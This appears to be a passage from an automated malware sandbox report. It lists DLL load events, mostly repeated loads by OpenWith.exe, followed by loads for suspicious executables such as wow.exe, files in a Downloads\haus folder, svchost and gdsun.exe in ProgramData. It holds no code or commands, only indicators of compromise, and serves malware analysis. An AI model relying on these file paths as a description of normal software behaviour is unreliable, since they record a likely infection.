                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: vcruntime140.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: libffi-8.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: libcrypto-1_1.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: libssl-1_1.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\sel1.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Downloads\haus\traf.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\Downloads\haus\traf.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\Downloads\haus\traf.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\Downloads\haus\traf.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\Downloads\haus\traf.exeSection loaded: netutils.dll
                            Source: C:\Users\user\Downloads\haus\traf.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\Downloads\haus\traf.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\Downloads\haus\traf.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\Downloads\haus\traf.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Downloads\haus\traf.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Downloads\haus\traf.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: napinsp.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wshbth.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winrnr.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wsock32.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pstorec.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                            Source: C:\Users\user\Downloads\haus\amada2.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\Downloads\haus\amada2.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\Downloads\haus\amada2.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Downloads\haus\amada2.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\Downloads\haus\amada2.exeSection loaded: napinsp.dll
                            Source: C:\Users\user\Downloads\haus\amada2.exeSection loaded: pnrpnsp.dll
                            Source: C:\Users\user\Downloads\haus\amada2.exeSection loaded: wshbth.dll
                            Source: C:\Users\user\Downloads\haus\amada2.exeSection loaded: nlaapi.dll
                            Source: C:\Users\user\Downloads\haus\amada2.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\Downloads\haus\amada2.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\Downloads\haus\amada2.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\Downloads\haus\amada2.exeSection loaded: rasadhlp.dll
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeSection loaded: apphelp.dll
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeSection loaded: wsock32.dll
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeSection loaded: sspicli.dll
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeSection loaded: mswsock.dll
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeSection loaded: napinsp.dll
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeSection loaded: pnrpnsp.dll
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeSection loaded: wshbth.dll
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeSection loaded: nlaapi.dll
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeSection loaded: iphlpapi.dll
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeSection loaded: dnsapi.dll
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeSection loaded: winrnr.dll
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: version.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: propsys.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: edputil.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: netutils.dll
                            Source: C:\Users\user\Downloads\haus\vapo.exeSection loaded: windows.staterepositoryps.dll
